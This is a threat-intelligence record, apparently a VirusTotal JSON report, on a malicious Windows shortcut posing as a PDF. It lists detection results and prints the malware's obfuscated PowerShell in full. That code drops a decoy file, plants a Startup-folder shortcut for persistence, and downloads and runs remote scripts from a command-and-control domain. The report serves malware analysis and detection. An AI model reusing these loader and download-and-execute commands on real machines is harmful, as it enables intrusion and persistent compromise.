80088af673b0117dbd5cf528021dd970
Hash
- MD5: 80088af673b0117dbd5cf528021dd970
- SHA1: 0149c5e7d551a180084d933b6096542a4ee529b0
- SHA256: 17fe715f3819baa851126d52af8b70c0016bf9288b0b0ebbc3715053973739e4
- First Seen: 2026-05-15
- Last Seen: 2026-05-15
-
1
Related Reports
-
0
Related IOCs
Additional Information
VirusTotal
{
"data": {
"id": "17fe715f3819baa851126d52af8b70c0016bf9288b0b0ebbc3715053973739e4",
"type": "file",
"links": {
"self": "https://www.virustotal.com/api/v3/files/17fe715f3819baa851126d52af8b70c0016bf9288b0b0ebbc3715053973739e4"
},
"attributes": {
"md5": "80088af673b0117dbd5cf528021dd970",
"type_extension": "lnk",
"vhash": "a23ee1f8d4f96377bc27340354287bb5",
"first_submission_date": 1773619847,
"sigma_analysis_stats": {
"critical": 0,
"high": 5,
"medium": 11,
"low": 7
},
"trid": [
{
"file_type": "Windows Shortcut",
"probability": 100.0
}
],
"crowdsourced_ids_results": [
{
"rule_category": "Potentially Bad Traffic",
"alert_severity": "low",
"rule_msg": "ET INFO DNS Query for Suspicious .icu Domain",
"rule_id": "1:2026888",
"rule_source": "Proofpoint Emerging Threats Open",
"rule_url": "https://rules.emergingthreats.net/",
"rule_raw": "alert dns $HOME_NET any -> any any (msg:\"ET INFO DNS Query for Suspicious .icu Domain\"; threshold: type limit, count 1, track by_src, seconds 120; dns.query; content:\".icu\"; nocase; endswith; classtype:bad-unknown; sid:2026888; rev:4; metadata:attack_target Client_Endpoint, created_at 2019_02_06, deployment Perimeter, confidence Medium, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_11_21;)",
"alert_context": [
{
"dest_ip": "8.8.8.8",
"dest_port": 53
}
]
},
{
"rule_category": "Potentially Bad Traffic",
"alert_severity": "low",
"rule_msg": "ET INFO Suspicious Domain (*.icu) in TLS SNI",
"rule_id": "1:2026889",
"rule_source": "Proofpoint Emerging Threats Open",
"rule_url": "https://rules.emergingthreats.net/",
"rule_raw": "alert tls $HOME_NET any -> $EXTERNAL_NET any (msg:\"ET INFO Suspicious Domain (*.icu) in TLS SNI\"; flow:established,to_server; threshold: type limit, count 1, track by_src, seconds 120; tls.sni; content:\".icu\"; endswith; fast_pattern; nocase; classtype:bad-unknown; sid:2026889; rev:4; metadata:attack_target Client_Endpoint, created_at 2019_02_06, deployment Perimeter, confidence High, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2022_11_21;)",
"alert_context": [
{
"dest_ip": "195.26.242.135",
"dest_port": 443,
"ja3": [
"3b5074b1b5d032e5620f69f9f700ff0e"
],
"ja3s": [
"394441ab65754e2207b1e1b457b3641d"
]
},
{
"dest_ip": "195.26.242.135",
"dest_port": 443,
"ja3": [
"3c4eb72b882d4d1442c67ce73f1292a9"
],
"ja3s": [
"15af977ce25de452b96affa2addb1036"
]
}
]
},
{
"rule_category": "Potentially Bad Traffic",
"alert_severity": "low",
"rule_msg": "ET HUNTING Observed Let's Encrypt Certificate for Suspicious TLD (.icu)",
"rule_id": "1:2026890",
"rule_source": "Proofpoint Emerging Threats Open",
"rule_url": "https://rules.emergingthreats.net/",
"rule_raw": "alert tls $EXTERNAL_NET any -> $HOME_NET any (msg:\"ET HUNTING Observed Let's Encrypt Certificate for Suspicious TLD (.icu)\"; flow:established,to_client; tls.cert_subject; content:\".icu\"; endswith; tls.cert_issuer; content:\"Let's Encrypt\"; classtype:bad-unknown; sid:2026890; rev:3; metadata:attack_target Client_Endpoint, created_at 2019_02_06, deployment Perimeter, confidence Medium, signature_severity Minor, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_16;)",
"alert_context": [
{
"src_ip": "195.26.242.135",
"src_port": 443,
"ja3": [
"3b5074b1b5d032e5620f69f9f700ff0e"
],
"ja3s": [
"098e26e2609212ac1bfac552fbe04127"
]
}
]
},
{
"rule_category": "Potentially Bad Traffic",
"alert_severity": "low",
"rule_msg": "ET INFO PS1 Powershell File Request",
"rule_id": "1:2032162",
"rule_source": "Proofpoint Emerging Threats Open",
"rule_url": "https://rules.emergingthreats.net/",
"rule_raw": "alert http $HOME_NET any -> $EXTERNAL_NET any (msg:\"ET INFO PS1 Powershell File Request\"; flow:established,from_client; flowbits:set,ET.PS.Download; http.request_line; content:\".ps1 HTTP/1.\"; nocase; fast_pattern; classtype:bad-unknown; sid:2032162; rev:1; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, created_at 2021_03_18, deployment Perimeter, confidence High, signature_severity Informational, updated_at 2021_03_18;)",
"alert_context": [
{
"dest_ip": "195.26.242.135",
"dest_port": 80,
"hostname": "nelark.icu",
"url": "http://nelark.icu/xftaswx/res/post_proc.php?fpath=a.ps1"
}
]
}
],
"sha1": "0149c5e7d551a180084d933b6096542a4ee529b0",
"powershell_info": {
"dotnet_calls": [
"IO.File"
],
"cmdlets": [
"new-object",
"out-null"
],
"cmdlets_alias": [
"iex"
]
},
"names": [
"1.pdf.lnk"
],
"tags": [
"long-sleeps",
"url-pattern",
"detect-debug-environment",
"hiding-window",
"lnk",
"high-entropy",
"long-command-line-arguments",
"calls-wmi",
"large-file",
"persistence"
],
"meaningful_name": "1.pdf.lnk",
"crowdsourced_yara_results": [
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "High_Entropy_LNK",
"match_date": 1779792593,
"description": "Identifies shortcut (LNK) file with equal or higher entropy than 6.5. Most goodware LNK files have a low entropy, lower than 6.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
},
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "PDF_in_LNK",
"match_date": 1779792593,
"description": "Identifies Adobe Acrobat artefacts in shortcut (LNK) files. A PDF document is typically used as decoy in a malicious LNK.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
}
],
"last_analysis_date": 1779792445,
"magic": "MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=325, ctime=Thu Dec 31 23:59:59 1969, mtime=Thu Dec 31 23:59:59 1969, atime=Thu Dec 31 23:59:59 1969, length=0, window=hidenormalshowminimized",
"sigma_analysis_summary": {
"Sigma Integrated Rule Set (GitHub)": {
"critical": 0,
"high": 5,
"medium": 11,
"low": 7
}
},
"tlsh": "T17BA29E141FDF2319E6B38A31B8FD7748587B3C1DDDB18B4C0255CA8925A5A00A8B7F66",
"type_description": "Windows shortcut",
"reputation": -2,
"times_submitted": 1,
"last_analysis_results": {
"Bkav": {
"method": "blacklist",
"engine_name": "Bkav",
"engine_version": "8.2.40(8338)",
"engine_update": "20260525",
"category": "undetected",
"result": null
},
"Lionic": {
"method": "blacklist",
"engine_name": "Lionic",
"engine_version": "8.16",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan.WinLNK.Runner.4!c"
},
"MicroWorld-eScan": {
"method": "blacklist",
"engine_name": "MicroWorld-eScan",
"engine_version": "14.0.409.0",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan.Downloader.335"
},
"ClamAV": {
"method": "blacklist",
"engine_name": "ClamAV",
"engine_version": "1.5.2.0",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"CTX": {
"method": "blacklist",
"engine_name": "CTX",
"engine_version": "2024.8.29.1",
"engine_update": "20260526",
"category": "malicious",
"result": "lnk.trojan.runner"
},
"CAT-QuickHeal": {
"method": "blacklist",
"engine_name": "CAT-QuickHeal",
"engine_version": "22.00",
"engine_update": "20260525",
"category": "undetected",
"result": null
},
"Skyhigh": {
"method": "blacklist",
"engine_name": "Skyhigh",
"engine_version": "v2021.2.0+4045",
"engine_update": "20260525",
"category": "malicious",
"result": "BehavesLike.Trojan.mb"
},
"ALYac": {
"method": "blacklist",
"engine_name": "ALYac",
"engine_version": "2.0.0.10",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan.Agent.LNK.Gen"
},
"Malwarebytes": {
"method": "blacklist",
"engine_name": "Malwarebytes",
"engine_version": "3.1.0.235",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"VIPRE": {
"method": "blacklist",
"engine_name": "VIPRE",
"engine_version": "6.0.0.35",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan.Downloader.335"
},
"Sangfor": {
"method": "blacklist",
"engine_name": "Sangfor",
"engine_version": "2.22.3.0",
"engine_update": "20260525",
"category": "undetected",
"result": null
},
"K7AntiVirus": {
"method": "blacklist",
"engine_name": "K7AntiVirus",
"engine_version": "14.54.59618",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"K7GW": {
"method": "blacklist",
"engine_name": "K7GW",
"engine_version": "14.54.59617",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"CrowdStrike": {
"method": "blacklist",
"engine_name": "CrowdStrike",
"engine_version": "1.0",
"engine_update": "20251219",
"category": "undetected",
"result": null
},
"huorong": {
"method": "blacklist",
"engine_name": "huorong",
"engine_version": "b8a15cc:b8a15cc:e0fccfc:e0fccfc",
"engine_update": "20260525",
"category": "malicious",
"result": "Trojan/LNK.Runner.ac"
},
"VirIT": {
"method": "blacklist",
"engine_name": "VirIT",
"engine_version": "9.5.1214",
"engine_update": "20260525",
"category": "undetected",
"result": null
},
"Symantec": {
"method": "blacklist",
"engine_name": "Symantec",
"engine_version": "1.22.0.0",
"engine_update": "20260525",
"category": "malicious",
"result": "CL.Downloader!gen11"
},
"ESET-NOD32": {
"method": "blacklist",
"engine_name": "ESET-NOD32",
"engine_version": "18.2.18.0",
"engine_update": "20260526",
"category": "malicious",
"result": "LNK/TrojanDownloader.Agent.CRN trojan"
},
"TrendMicro-HouseCall": {
"method": "blacklist",
"engine_name": "TrendMicro-HouseCall",
"engine_version": "24.550.0.1002",
"engine_update": "20260526",
"category": "malicious",
"result": "HEUR_LNKEXEC.A"
},
"Avast": {
"method": "blacklist",
"engine_name": "Avast",
"engine_version": "23.9.8494.0",
"engine_update": "20260515",
"category": "malicious",
"result": "Other:Malware-gen [Trj]"
},
"Cynet": {
"method": "blacklist",
"engine_name": "Cynet",
"engine_version": "4.0.3.4",
"engine_update": "20260526",
"category": "malicious",
"result": "Malicious (score: 99)"
},
"Kaspersky": {
"method": "blacklist",
"engine_name": "Kaspersky",
"engine_version": "22.0.1.28",
"engine_update": "20260526",
"category": "malicious",
"result": "HEUR:Trojan.WinLNK.Turla.gen"
},
"BitDefender": {
"method": "blacklist",
"engine_name": "BitDefender",
"engine_version": "7.2",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan.Downloader.335"
},
"NANO-Antivirus": {
"method": "blacklist",
"engine_name": "NANO-Antivirus",
"engine_version": "1.0.170.26895",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"ViRobot": {
"method": "blacklist",
"engine_name": "ViRobot",
"engine_version": "2014.3.20.0",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"Rising": {
"method": "blacklist",
"engine_name": "Rising",
"engine_version": "25.0.0.28",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan.PSRunner/LNK!1.BADE (CLASSIC)"
},
"Emsisoft": {
"method": "blacklist",
"engine_name": "Emsisoft",
"engine_version": "2024.8.0.61147",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan.PowerShell.Gen (A)"
},
"F-Secure": {
"method": "blacklist",
"engine_name": "F-Secure",
"engine_version": "18.10.1547.307",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan.TR/Malware"
},
"DrWeb": {
"method": "blacklist",
"engine_name": "DrWeb",
"engine_version": "7.0.75.2070",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"Zillya": {
"method": "blacklist",
"engine_name": "Zillya",
"engine_version": "2.0.0.5608",
"engine_update": "20260525",
"category": "undetected",
"result": null
},
"TrendMicro": {
"method": "blacklist",
"engine_name": "TrendMicro",
"engine_version": "24.550.0.1002",
"engine_update": "20260526",
"category": "malicious",
"result": "HEUR_LNKEXEC.A"
},
"McAfeeD": {
"method": "blacklist",
"engine_name": "McAfeeD",
"engine_version": "1.2.0.14532",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan:Shortcut/Pslauncher.EAA"
},
"CMC": {
"method": "blacklist",
"engine_name": "CMC",
"engine_version": "2.4.2022.1",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"Sophos": {
"method": "blacklist",
"engine_name": "Sophos",
"engine_version": "3.5.1.0",
"engine_update": "20260526",
"category": "malicious",
"result": "Troj/DownLnk-CM"
},
"Ikarus": {
"method": "blacklist",
"engine_name": "Ikarus",
"engine_version": "6.4.16.0",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan-Downloader.LNK.Agent"
},
"GData": {
"method": "blacklist",
"engine_name": "GData",
"engine_version": "GD:27.44681AVA:64.31308",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan.Downloader.335"
},
"Jiangmin": {
"method": "blacklist",
"engine_name": "Jiangmin",
"engine_version": "16.0.100",
"engine_update": "20260525",
"category": "undetected",
"result": null
},
"Google": {
"method": "blacklist",
"engine_name": "Google",
"engine_version": "1779791479",
"engine_update": "20260526",
"category": "malicious",
"result": "Detected"
},
"Avira": {
"method": "blacklist",
"engine_name": "Avira",
"engine_version": "8.3.3.24",
"engine_update": "20260526",
"category": "malicious",
"result": "TR/Malware"
},
"Antiy-AVL": {
"method": "blacklist",
"engine_name": "Antiy-AVL",
"engine_version": "3.0",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"Kingsoft": {
"method": "blacklist",
"engine_name": "Kingsoft",
"engine_version": "None",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"Gridinsoft": {
"method": "blacklist",
"engine_name": "Gridinsoft",
"engine_version": "1.0.246.174",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"Xcitium": {
"method": "blacklist",
"engine_name": "Xcitium",
"engine_version": "38677",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"Arcabit": {
"method": "blacklist",
"engine_name": "Arcabit",
"engine_version": "2025.0.0.23",
"engine_update": "20260526",
"category": "malicious",
"result": "Trojan.Downloader.335"
},
"SUPERAntiSpyware": {
"method": "blacklist",
"engine_name": "SUPERAntiSpyware",
"engine_version": "5.6.0.1032",
"engine_update": "20260525",
"category": "undetected",
"result": null
},
"ZoneAlarm": {
"method": "blacklist",
"engine_name": "ZoneAlarm",
"engine_version": "6.25-116107039",
"engine_update": "20260526",
"category": "malicious",
"result": "Troj/DownLnk-CM"
},
"Microsoft": {
"method": "blacklist",
"engine_name": "Microsoft",
"engine_version": "1.1.26040.8",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"Varist": {
"method": "blacklist",
"engine_name": "Varist",
"engine_version": "6.6.1.3",
"engine_update": "20260526",
"category": "malicious",
"result": "LNK/ABTrojan.ZIOH-"
},
"AhnLab-V3": {
"method": "blacklist",
"engine_name": "AhnLab-V3",
"engine_version": "3.30.0.10666",
"engine_update": "20260526",
"category": "malicious",
"result": "LNK/Runner.S1"
},
"Acronis": {
"method": "blacklist",
"engine_name": "Acronis",
"engine_version": "1.2.0.121",
"engine_update": "20240328",
"category": "undetected",
"result": null
},
"VBA32": {
"method": "blacklist",
"engine_name": "VBA32",
"engine_version": "5.6.1",
"engine_update": "20260526",
"category": "malicious",
"result": "suspected of Trojan.Link.PsLauncher"
},
"TACHYON": {
"method": "blacklist",
"engine_name": "TACHYON",
"engine_version": "2026-05-26.02",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"Zoner": {
"method": "blacklist",
"engine_name": "Zoner",
"engine_version": "2.2.2.0",
"engine_update": "20260526",
"category": "malicious",
"result": "Probably Heur.LNKScript"
},
"Tencent": {
"method": "blacklist",
"engine_name": "Tencent",
"engine_version": "1.0.0.1",
"engine_update": "20260526",
"category": "malicious",
"result": "Win32.Trojan-Downloader.Der.Njgl"
},
"Yandex": {
"method": "blacklist",
"engine_name": "Yandex",
"engine_version": "5.5.2.24",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"TrellixENS": {
"method": "blacklist",
"engine_name": "TrellixENS",
"engine_version": "6.0.6.653",
"engine_update": "20260525",
"category": "undetected",
"result": null
},
"SentinelOne": {
"method": "blacklist",
"engine_name": "SentinelOne",
"engine_version": "7.6.2.19",
"engine_update": "20260324",
"category": "undetected",
"result": null
},
"MaxSecure": {
"method": "blacklist",
"engine_name": "MaxSecure",
"engine_version": "1.0.0.1",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"Fortinet": {
"method": "blacklist",
"engine_name": "Fortinet",
"engine_version": "7.0.48.0",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"AVG": {
"method": "blacklist",
"engine_name": "AVG",
"engine_version": "23.9.8494.0",
"engine_update": "20260515",
"category": "malicious",
"result": "Other:Malware-gen [Trj]"
},
"Panda": {
"method": "blacklist",
"engine_name": "Panda",
"engine_version": "4.6.4.2",
"engine_update": "20260525",
"category": "undetected",
"result": null
},
"alibabacloud": {
"method": "blacklist",
"engine_name": "alibabacloud",
"engine_version": "2.2.0",
"engine_update": "20250321",
"category": "malicious",
"result": "Trojan[downloader]:Win/Turla.gyf"
},
"Avast-Mobile": {
"method": "blacklist",
"engine_name": "Avast-Mobile",
"engine_version": "260526-00",
"engine_update": "20260526",
"category": "type-unsupported",
"result": null
},
"SymantecMobileInsight": {
"method": "blacklist",
"engine_name": "SymantecMobileInsight",
"engine_version": "2.0",
"engine_update": "20260123",
"category": "type-unsupported",
"result": null
},
"BitDefenderFalx": {
"method": "blacklist",
"engine_name": "BitDefenderFalx",
"engine_version": "2.0.936",
"engine_update": "20260525",
"category": "type-unsupported",
"result": null
},
"DeepInstinct": {
"method": "blacklist",
"engine_name": "DeepInstinct",
"engine_version": "5.0.0.8",
"engine_update": "20260526",
"category": "type-unsupported",
"result": null
},
"Elastic": {
"method": "blacklist",
"engine_name": "Elastic",
"engine_version": "4.0.263",
"engine_update": "20260526",
"category": "type-unsupported",
"result": null
},
"Webroot": {
"method": "blacklist",
"engine_name": "Webroot",
"engine_version": "1.9.0.8",
"engine_update": "20250227",
"category": "type-unsupported",
"result": null
},
"APEX": {
"method": "blacklist",
"engine_name": "APEX",
"engine_version": "6.782",
"engine_update": "20260525",
"category": "type-unsupported",
"result": null
},
"Paloalto": {
"method": "blacklist",
"engine_name": "Paloalto",
"engine_version": "0.9.0.1003",
"engine_update": "20260526",
"category": "type-unsupported",
"result": null
},
"Alibaba": {
"method": "blacklist",
"engine_name": "Alibaba",
"engine_version": "0.3.0.5",
"engine_update": "20190527",
"category": "type-unsupported",
"result": null
},
"Trapmine": {
"method": "blacklist",
"engine_name": "Trapmine",
"engine_version": "4.0.12.0",
"engine_update": "20260504",
"category": "type-unsupported",
"result": null
},
"Cylance": {
"method": "blacklist",
"engine_name": "Cylance",
"engine_version": "3.0.0.0",
"engine_update": "20260521",
"category": "type-unsupported",
"result": null
},
"tehtris": {
"method": "blacklist",
"engine_name": "tehtris",
"engine_version": "v0.1.4",
"engine_update": "20260526",
"category": "type-unsupported",
"result": null
},
"Trustlook": {
"method": "blacklist",
"engine_name": "Trustlook",
"engine_version": "1.0",
"engine_update": "20260526",
"category": "type-unsupported",
"result": null
}
},
"last_modification_date": 1779799792,
"last_submission_date": 1773619847,
"magika": "LNK",
"filecondis": {
"dhash": "747c78586c280000",
"raw_md5": "5de98847f93df72c4a757beb0a6bd857"
},
"sha256": "17fe715f3819baa851126d52af8b70c0016bf9288b0b0ebbc3715053973739e4",
"ssdeep": "384:W5T5mgbIz7cSA0JyRIUrt/q05bGbTEhG2RAbEK2yaU063KvGPis:wz0YLc1ghBAbEFZU0kKuN",
"unique_sources": 1,
"lnk_info": {
"modification_date": "1970-01-01T00:00:00Z",
"link_flags": [
"HasTargetIDList",
"HasName",
"HasRelativePath",
"IsUnicode",
"HasArguments",
"HasExpIcon",
"HasIconLocation"
],
"command_line_arguments": " -WindowStyle Hidden -command $src='1.pdf.lnk'; $out=$env:TEMP + '\\1.pdf'; $fs=[IO.File]::OpenRead($src);$fs.Seek(20KB,'Begin')|Out-Null;$b=New-Object byte[] ($fs.Length - 20KB);$fs.Read($b,0,$b.Length)|Out-Null;$fs.Close();[IO.File]::WriteAllBytes($out,$b);start $out; $out=[Environment]::GetFolderPath('Startup') + '\\OneDrive.lnk'; $fs=[IO.File]::OpenRead($src);$fs.Seek(10KB,'Begin')|Out-Null;$b=New-Object byte[] (10KB);$fs.Read($b,0,$b.Length)|Out-Null;$fs.Close();[IO.File]::WriteAllBytes($out,$b); &{$ty = 'dvn7d#Jt' + 'Bdj*cjU' + 'bn^v45F' + 'hjw#dhC' + 'ghi576_f#Ky' + 'jh9fKJ'; [string] $aCmd = {(New-fcxObject Nfcxetfcx.WebCfcxlient).DofcxwnlfcxoadfcxStrfcxinfcxg('ht' + 'tps:/' + '/fcxfcxfcx' + 'fcxnelarkfcxfcxfcx.icu' + 'fcxfcx/fcxfcxfcxxftaswx/res/' + 'fcxbb.fcxphp')}; $rCmd = $aCmd.replace('fcx', ''); $finalExec = iex $rCmd; iex $finalExec; }",
"icon_location": "%SystemRoot%\\System32\\shell32.dll",
"creation_date": "1970-01-01T00:00:00Z",
"target_path": "My Computer (Computer) : C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"header": {
"show_window": 7,
"file_size": 0,
"hot_key": "(0+0)",
"show_window_str": "SW_SHOWMINNOACTIVE"
},
"link_target_id_list": [
{
"item_type": 31,
"item_type_str": "CLSID_ShellDesktop",
"clsid": "20d04fe0-3aea-1069-a2d8-08002b30309d"
}
],
"access_date": "1970-01-01T00:00:00Z",
"relative_path": "..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
},
"sandbox_verdicts": {
"Zenbox": {
"category": "malicious",
"malware_classification": [
"MALWARE",
"EVADER"
],
"sandbox_name": "Zenbox",
"confidence": 100
},
"Dr.Web vxCube": {
"category": "malicious",
"malware_classification": [
"MALWARE"
],
"sandbox_name": "Dr.Web vxCube"
}
},
"type_tags": [
"windows",
"lnk"
],
"first_seen_itw_date": 1773657874,
"popular_threat_classification": {
"popular_threat_name": [
{
"value": "runner",
"count": 4
},
{
"value": "downlnk",
"count": 2
},
{
"value": "lnkexec",
"count": 2
}
],
"suggested_threat_label": "trojan.runner/downlnk",
"popular_threat_category": [
{
"value": "trojan",
"count": 22
},
{
"value": "downloader",
"count": 10
}
]
},
"sigma_analysis_results": [
{
"rule_level": "high",
"rule_id": "7d262d8417cb03b2a9d2b935ae55980f22abc3aa7cffc36e57eda761068226dc",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell Invocations - Specific",
"rule_description": "Detects suspicious PowerShell invocation command parameters",
"rule_author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro",
"match_context": [
{
"values": {
"ScriptBlockText": "\r\n$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\",\"\");\r\n\r\nstart \"Screenshot_2.png\"\r\nRemove-Item \"Screenshot_1.png.lnk\" -ErrorAction SilentlyContinue\r\nCopy-Item \"Screenshot_2.png\" \"Screenshot_1.png\" \r\n\r\nfunction gid\r\n{\r\n\t$regPath = \"HKLM:\\Software\\Wireless\"\r\n\t$exist = Get-ItemProperty $regPath -Name uid -ErrorAction SilentlyContinue\r\n\tif ($null -ne $exist) {\r\n\t\t$uid = (Get-ItemProperty $regPath -Name uid).uid\r\n\t}\r\n\telse {\r\n\t\t$local = \"$env:public\\documents\\id.l [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "189d1f84-c320-4cb7-8fa3-715bbefca8a1",
"Path": "",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "function gCommand {\r\n\t$url = $mainUri + \"res/get-command.php?uid=$gUid\"\r\n\t# echo $url;\r\n\t$WebClient = New-Object System.Net.WebClient\r\n\t$codestring = $WebClient.DownloadString($url)\r\n\tif (\"\" -ne $codestring) {\r\n\t\tif ($codestring.contains(\"autoreconnect id\")) {\r\n\t\t\tiex $codestring\r\n\t\t}\r\n\t\telse {\r\n\t\t\t$decode = $executioncontext.InvokeCommand.NewScriptBlock($codestring)\r\n\t\t\t$JobName = \"Command\"\r\n\t\t\tStop-Job -Name $JobName\r\n\t\t\tRemove-Job -Name $JobName\r\n\t\t\tStart-Job -ScriptBlock $decode -Name $JobNa [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "553492fd-d39c-4686-8094-33cf56a222f9",
"Path": "",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "$obj = New-Object Net.WebClient;$s = $obj.DownloadString(\"http://nelark.icu/xftaswx/res/post_proc.php?fpath=a.ps1\");iex $s",
"MessageTotal": "1",
"ScriptBlockId": "114583d0-deb7-40f2-85f8-530f97968a24",
"Path": "",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\",\"\");\r\n\r\nfunction newDir($path) {\r\n\tif ((Test-Path $path) -eq $false ) {\r\n\t\tNew-Item -ItemType Directory -Path $path\r\n\t}\r\n}\r\n\r\nfunction gid\r\n{\r\n\t$regPath = \"HKLM:\\Software\\Wireless\"\r\n\t$exist = Get-ItemProperty $regPath -Name uid -ErrorAction SilentlyContinue\r\n\tif ($null -ne $exist) {\r\n\t\t$uid = (Get-ItemProperty $regPath -Name uid).uid\r\n\t}\r\n\telse {\r\n\t\t$local = \"$env:public\\documents\\id.log\"\r\n\t\tif (Test-Path $local) [TRUNCATED]",
"Path": "",
"ScriptBlockId": "b1b561d6-f30f-4c48-b9d7-b59f4e127079",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "\r\n$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\",\"\");\r\n\r\nstart \"Screenshot_2.png\"\r\nRemove-Item \"Screenshot_1.png.lnk\" -ErrorAction SilentlyContinue\r\nCopy-Item \"Screenshot_2.png\" \"Screenshot_1.png\" \r\n\r\nfunction gid\r\n{\r\n\t$regPath = \"HKLM:\\Software\\Wireless\"\r\n\t$exist = Get-ItemProperty $regPath -Name uid -ErrorAction SilentlyContinue\r\n\tif ($null -ne $exist) {\r\n\t\t$uid = (Get-ItemProperty $regPath -Name uid).uid\r\n\t}\r\n\telse {\r\n\t\t$local = \"$env:public\\documents\\id.l [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "0aa6d143-3ab3-4a7f-9b19-fa0dc39031ea",
"Path": "",
"MessageNumber": "1",
"EventID": "4104"
}
}
]
},
{
"rule_level": "high",
"rule_id": "9cede5a1c6382a5e4dd57d439fbcb57f927088bb5c3e1d4019c03562c3b4f9e5",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell IEX Execution Patterns",
"rule_description": "Detects suspicious ways to run Invoke-Execution using IEX alias",
"rule_author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule",
"CommandLine": "cmd.exe /c powershell -w h -command $obj = New-Object Net.WebClient;$s = $obj.DownloadString(\\\"http://nelark.icu/xftaswx/res/post_proc.php?fpath=a.ps1\\\");iex $s",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\svchost.exe",
"IntegrityLevel": "System",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "cmd.exe /c powershell -w h -command $obj = New-Object Net.WebClient;$s = $obj.DownloadString(\\\"http://nelark.icu/xftaswx/res/post_proc.php?fpath=a.ps1\\\");iex $s",
"CommandLine": "powershell -w h -command $obj = New-Object Net.WebClient;$s = $obj.DownloadString(\\\"http://nelark.icu/xftaswx/res/post_proc.php?fpath=a.ps1\\\");iex $s",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "System",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "d0b906c9286d892a8434845afa7551135e37841bdace5aa7fdf1c6bd9a823c73",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
